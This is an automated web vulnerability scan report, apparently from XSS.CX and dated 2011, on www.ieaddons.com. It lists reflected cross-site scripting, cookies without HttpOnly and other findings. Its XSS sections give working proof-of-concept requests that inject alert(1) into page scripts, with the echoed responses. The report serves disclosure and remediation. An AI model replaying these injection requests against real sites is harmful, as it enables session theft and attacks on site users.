XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, ieaddons.com

Report generated by XSS.CX at Sun Dec 04 08:40:18 CST 2011.

Loading



1. Cross-site scripting (reflected)

1.1. http://www.ieaddons.com/en/addons/detail.aspx [44de6%22%3balert(1)//fff30f29ff4 parameter]

1.2. http://www.ieaddons.com/en/addons/detail.aspx [name of an arbitrarily supplied request parameter]

1.3. http://www.ieaddons.com/us/addons/default.aspx [name of an arbitrarily supplied request parameter]

2. Source code disclosure

3. Cross-domain Referer leakage

4. Cross-domain script include

5. Cookie without HttpOnly flag set

5.1. http://www.ieaddons.com/en/addons/detail.aspx

5.2. http://www.ieaddons.com/en/addons/detail.aspx/

5.3. http://www.ieaddons.com/en/signout.aspx

5.4. http://www.ieaddons.com/us/

5.5. http://www.ieaddons.com/us/Register.aspx

5.6. http://www.ieaddons.com/us/pinnedsites/default.aspx

5.7. http://www.ieaddons.com/us/pinnedsites/detail.aspx

5.8. http://www.ieaddons.com/us/trackingprotectionlists/default.aspx

6. Email addresses disclosed



1. Cross-site scripting (reflected)  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.ieaddons.com/en/addons/detail.aspx [44de6%22%3balert(1)//fff30f29ff4 parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ieaddons.com
Path:   /en/addons/detail.aspx

Issue detail

The value of the 44de6%22%3balert(1)//fff30f29ff4 request parameter is copied into a JavaScript rest-of-line comment. The payload a39de%0aalert(1)//66f4feb873d was submitted in the 44de6%22%3balert(1)//fff30f29ff4 parameter. This input was echoed as a39de
alert(1)//66f4feb873d
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/addons/detail.aspx?id=790&44de6%22%3balert(1)//fff30f29ff4=1a39de%0aalert(1)//66f4feb873d HTTP/1.1
Host: www.ieaddons.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:33:01 GMT
Last-Modified: Sun, 04 Dec 2011 03:33:01 GMT
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=hkoct4yumuhovlbxucvwcj2u; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=f5f81743-9691-4817-a6ca-710fc68e0691; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:33:01 GMT
Content-Length: 35489


<!DOCTYPE html>


<html lang="en" data-rootlocation="/en/"
xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com/2008/fbml"
xmlns:og="http://opg.me/ns#"
   x
...[SNIP]...
and channel on
the next lines. */
try {
s.account="";
s.pageName="addons detail / en-us / http://www.ieaddons.com/addons/detail.aspx?mainlang=en&maincountry=us&id=790&44de6";alert(1)//fff30f29ff4=1a39de
alert(1)//66f4feb873d
";
s.server=""
s.channel="addons detail";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="en-us";
/* C
...[SNIP]...

1.2. http://www.ieaddons.com/en/addons/detail.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ieaddons.com
Path:   /en/addons/detail.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload eff21%0aalert(1)//87b71ae05d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eff21
alert(1)//87b71ae05d7
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/addons/detail.aspx?id=790&44de6%22%3balert(1)//fff30f29ff4=1&eff21%0aalert(1)//87b71ae05d7=1 HTTP/1.1
Host: www.ieaddons.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:33:02 GMT
Last-Modified: Sun, 04 Dec 2011 03:33:02 GMT
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=mj0fgghqz03n2fjdbbyyungn; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=6fb3834e-2731-473b-bee5-b9257fc7b9fb; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:33:01 GMT
Content-Length: 35492


<!DOCTYPE html>


<html lang="en" data-rootlocation="/en/"
xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com/2008/fbml"
xmlns:og="http://opg.me/ns#"
   x
...[SNIP]...
nd channel on
the next lines. */
try {
s.account="";
s.pageName="addons detail / en-us / http://www.ieaddons.com/addons/detail.aspx?mainlang=en&maincountry=us&id=790&44de6";alert(1)//fff30f29ff4=1&eff21
alert(1)//87b71ae05d7
=1";
s.server=""
s.channel="addons detail";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="en-us";
/*
...[SNIP]...

1.3. http://www.ieaddons.com/us/addons/default.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ieaddons.com
Path:   /us/addons/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1218b"%3balert(1)//dc1277cd101 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1218b";alert(1)//dc1277cd101 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/addons/default.aspx?1218b"%3balert(1)//dc1277cd101=1 HTTP/1.1
Host: www.ieaddons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:41:10 GMT
Last-Modified: Sun, 04 Dec 2011 03:41:10 GMT
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=dm5opqu4u204quoztnr4txov; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=5b39dea5-0340-4fa0-989e-7cccb4de9309; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:10 GMT
Connection: close
Content-Length: 37674


<!DOCTYPE html>


<html lang="en" data-rootlocation="/en/"
xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com/2008/fbml"
xmlns:og="http://opg.me/ns#"
   x
...[SNIP]...
h page an identifying name, server, and channel on
the next lines. */
try {
s.account="";
s.pageName="addons browse / en-us / http://www.ieaddons.com/addons/default.aspx?mainlang=en&maincountry=us&1218b";alert(1)//dc1277cd101=1";
s.server=""
s.channel="addons browse";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="en-us";
/*
...[SNIP]...

2. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.ieaddons.com
Path:   /en/assets/js/interactions.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /en/assets/js/interactions.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.ieaddons.com/en/addons/detail.aspx?id=790&44de6%22%3balert(1)//fff30f29ff4=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.ieaddons.com
Cookie: ASP.NET_SessionId=iw4fjtemgtal52ogp31lo42q; ie8_webslice_anonymous=6fd6c5a3-83c3-4d69-95bb-099a5f055d79

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 02 Dec 2011 20:31:16 GMT
Accept-Ranges: bytes
ETag: "32eda75731b1cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:00 GMT
Content-Length: 65729

var CATEGORY = -1;
var RESOURCE_TYPE = -1;
var TOTAL_RESOURCE_COUNT = 0;
var CURRENT_PAGE = 1;
var FEATURE_NAME = 'all';
var CURRENT_LOCALE = 'en';
var SEARCH_TERM = '';

var user_agent = navi
...[SNIP]...
<fb:like class="fb_edge_width_with_comment fb_iframe_widget" \
href="http://www.iegallery.com/<%= Locale.GetCurrentLocale().CountryCode %>/pinnedsites/detail.aspx?id=<%= resource_id %>" layout="button_count" \
show_faces="false" send="true">
...[SNIP]...

3. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ieaddons.com
Path:   /en/addons/detail.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /en/addons/detail.aspx?id=790&44de6%22%3balert(1)//fff30f29ff4=1 HTTP/1.1
Host: www.ieaddons.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:32:51 GMT
Last-Modified: Sun, 04 Dec 2011 03:32:51 GMT
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nqougllxj4tf1403roibwcte; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=4e4e1a1a-f7e9-404e-a765-e508394dd812; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:32:51 GMT
Content-Length: 35462


<!DOCTYPE html>


<html lang="en" data-rootlocation="/en/"
xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com/2008/fbml"
xmlns:og="http://opg.me/ns#"
   x
...[SNIP]...
<li>
                               
<a id="LoginView1_SignInLink" href="https://internetexplorergallery.accesscontrol.windows.net:443/v2/wsfederation?wa=wsignin1.0&amp;wtrealm=http%3a%2f%2fwww.iegallery.com%2f">Sign In</a>
...[SNIP]...
<div id="message_download">
    <a class="download" href="http://microsoft.com/ie9" aria-label="Download Windows&copy; Internet Explorer 9 Now" onclick="Analytics.trackIEDownload();"
    accesskey="1">
Download Now</a>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<li id="twitter">
<iframe allowtransparency="true" frameborder="0" scrolling="no"
src="http://platform.twitter.com/widgets/tweet_button.html?text=Bing Search %23IE9"
style="width:130px; height:20px;">
</iframe>
...[SNIP]...
<div class="slides">
<img src="http://az31465.vo.msecnd.net/upload/5be50c16-c402-41bc-a788-70161efa0451_gm.jpg" id="Main_ResourceImageLarge" />

</div>
...[SNIP]...
<div class="login" style="display:none;" ><a href="https://internetexplorergallery.accesscontrol.windows.net:443/v2/wsfederation?wa=wsignin1.0&wtrealm=http%3a%2f%2fwww.iegallery.com%2f">Sign in now to rate</a>
...[SNIP]...
<p><a href="http://www.bing.com" id="Main_ResourceLink">http://www.bing.com</a>
...[SNIP]...
<div>
           <a href="http://www.microsoft.com/windows/"><img src="/assets/images/layout/logo_windows.png" alt="Windows" class="logo_windows" />
...[SNIP]...
<li><a href="http://support.microsoft.com/contactus/?ws=mscom" target="_blank">Contact Us</a>
...[SNIP]...
<li><a href="http://explore.live.com/microsoft-service-agreement?ref=none&mkt=en-us" id="termsLink" target="_blank">Terms of Use</a>
...[SNIP]...
<li><a href="http://www.microsoft.com/About/Legal/EN/US/IntellectualProperty/Trademarks/EN-US.aspx" target="_blank">Trademarks</a>
...[SNIP]...
<li><a href="http://privacy.microsoft.com/en-us/default.mspx" target="_blank">Privacy Statement</a>
...[SNIP]...
<li>
<a id="LoginView2_SubmitLink" href="https://internetexplorergallery.accesscontrol.windows.net:443/v2/wsfederation?wa=wsignin1.0&amp;wtrealm=http%3a%2f%2fwww.iegallery.com%2f">Submit to Gallery</a>
...[SNIP]...
<li><a class="news_center" href="http://www.microsoft.com/presspass/presskits/internetexplorer/" target="_blank">News Center</a>
...[SNIP]...
<span class="logo_azure" id="logo_azure"><a href="http://www.microsoft.com/windowsazure/" target="_blank"><img src="/assets/images/layout/logo_azure.png" />
...[SNIP]...
</span>
           <a href="http://www.microsoft.com"><img src="/assets/images/layout/logo_microsoft.png" alt="Microsoft" class="logo_microsoft" />
...[SNIP]...

4. Cross-domain script include  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ieaddons.com
Path:   /en/addons/detail.aspx

Issue detail

The response dynamically includes the following script from another domain:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET /en/addons/detail.aspx?id=790&44de6%22%3balert(1)//fff30f29ff4=1 HTTP/1.1
Host: www.ieaddons.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:32:51 GMT
Last-Modified: Sun, 04 Dec 2011 03:32:51 GMT
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nqougllxj4tf1403roibwcte; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=4e4e1a1a-f7e9-404e-a765-e508394dd812; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:32:51 GMT
Content-Length: 35462


<!DOCTYPE html>


<html lang="en" data-rootlocation="/en/"
xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com/2008/fbml"
xmlns:og="http://opg.me/ns#"
   x
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 8 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://www.ieaddons.com/en/addons/detail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ieaddons.com
Path:   /en/addons/detail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/addons/detail.aspx?id=790&44de6%22%3balert(1)//fff30f29ff4=1 HTTP/1.1
Host: www.ieaddons.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:32:51 GMT
Last-Modified: Sun, 04 Dec 2011 03:32:51 GMT
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nqougllxj4tf1403roibwcte; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=4e4e1a1a-f7e9-404e-a765-e508394dd812; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:32:51 GMT
Content-Length: 35462


<!DOCTYPE html>


<html lang="en" data-rootlocation="/en/"
xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com/2008/fbml"
xmlns:og="http://opg.me/ns#"
   x
...[SNIP]...

5.2. http://www.ieaddons.com/en/addons/detail.aspx/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ieaddons.com
Path:   /en/addons/detail.aspx/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/addons/detail.aspx/ HTTP/1.1
Host: www.ieaddons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:41:04 GMT
Last-Modified: Sun, 04 Dec 2011 03:41:04 GMT
Location: /addons/Default.aspx
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=udqn2kt5fynk2zqki42b4din; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=53f77998-87f7-43a0-bf32-6397935ca8cd; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:04 GMT
Connection: close
Content-Length: 137

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/addons/Default.aspx">here</a>.</h2>
</body></html>

5.3. http://www.ieaddons.com/en/signout.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ieaddons.com
Path:   /en/signout.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/signout.aspx HTTP/1.1
Host: www.ieaddons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://internetexplorergallery.accesscontrol.windows.net/v2/wsfederation?wa=wsignout1.0&wreply=http%3a%2f%2fwww.iegallery.com%2f
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=juadlf4lvrn3b3plytsidajr; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=a9b5d90a-a7cd-4e46-ab2b-241947e2b4a3; path=/
Set-Cookie: .ASPXAUTH=; expires=Tue, 12-Oct-1999 00:00:00 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:04 GMT
Connection: close
Content-Length: 250

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://internetexplorergallery.accesscontrol.windows.net/v2/wsfederation?wa=wsignout1.0&amp;wreply=http%3a%2f%2fwww.
...[SNIP]...

5.4. http://www.ieaddons.com/us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ieaddons.com
Path:   /us/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/ HTTP/1.1
Host: www.ieaddons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:41:06 GMT
Last-Modified: Sun, 04 Dec 2011 03:41:06 GMT
Location: /en/addons/default.aspx
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=itmd303ph0eqpb3jzggnbi1l; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=70904be6-ad5b-4cf7-a150-c77b735e5ad2; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:08 GMT
Connection: close
Content-Length: 140

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/en/addons/default.aspx">here</a>.</h2>
</body></html>

5.5. http://www.ieaddons.com/us/Register.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ieaddons.com
Path:   /us/Register.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/Register.aspx HTTP/1.1
Host: www.ieaddons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /en/addons/default.aspx
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=k1ujr3wblbumrm2wsrjqcgeu; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=40ba3686-9b0f-4df3-8a0c-80049dcf8ae9; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:07 GMT
Connection: close
Content-Length: 140

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/en/addons/default.aspx">here</a>.</h2>
</body></html>

5.6. http://www.ieaddons.com/us/pinnedsites/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ieaddons.com
Path:   /us/pinnedsites/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/pinnedsites/default.aspx HTTP/1.1
Host: www.ieaddons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:41:06 GMT
Last-Modified: Sun, 04 Dec 2011 03:41:06 GMT
Location: /en/addons/default.aspx
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=elcju1qynyn3agcd5n5xnei2; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=4285e9ea-311c-47fb-8f97-19c19b9eaebd; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:06 GMT
Connection: close
Content-Length: 140

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/en/addons/default.aspx">here</a>.</h2>
</body></html>

5.7. http://www.ieaddons.com/us/pinnedsites/detail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ieaddons.com
Path:   /us/pinnedsites/detail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/pinnedsites/detail.aspx HTTP/1.1
Host: www.ieaddons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /pinnedsites/Default.aspx
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=kngtwpz2h4x2tcytu4uosnwx; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=8cda5343-1e41-48fd-9501-9fce2b367c87; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:05 GMT
Connection: close
Content-Length: 142

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/pinnedsites/Default.aspx">here</a>.</h2>
</body></html>

5.8. http://www.ieaddons.com/us/trackingprotectionlists/default.aspx  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ieaddons.com
Path:   /us/trackingprotectionlists/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/trackingprotectionlists/default.aspx HTTP/1.1
Host: www.ieaddons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: public, max-age=3600
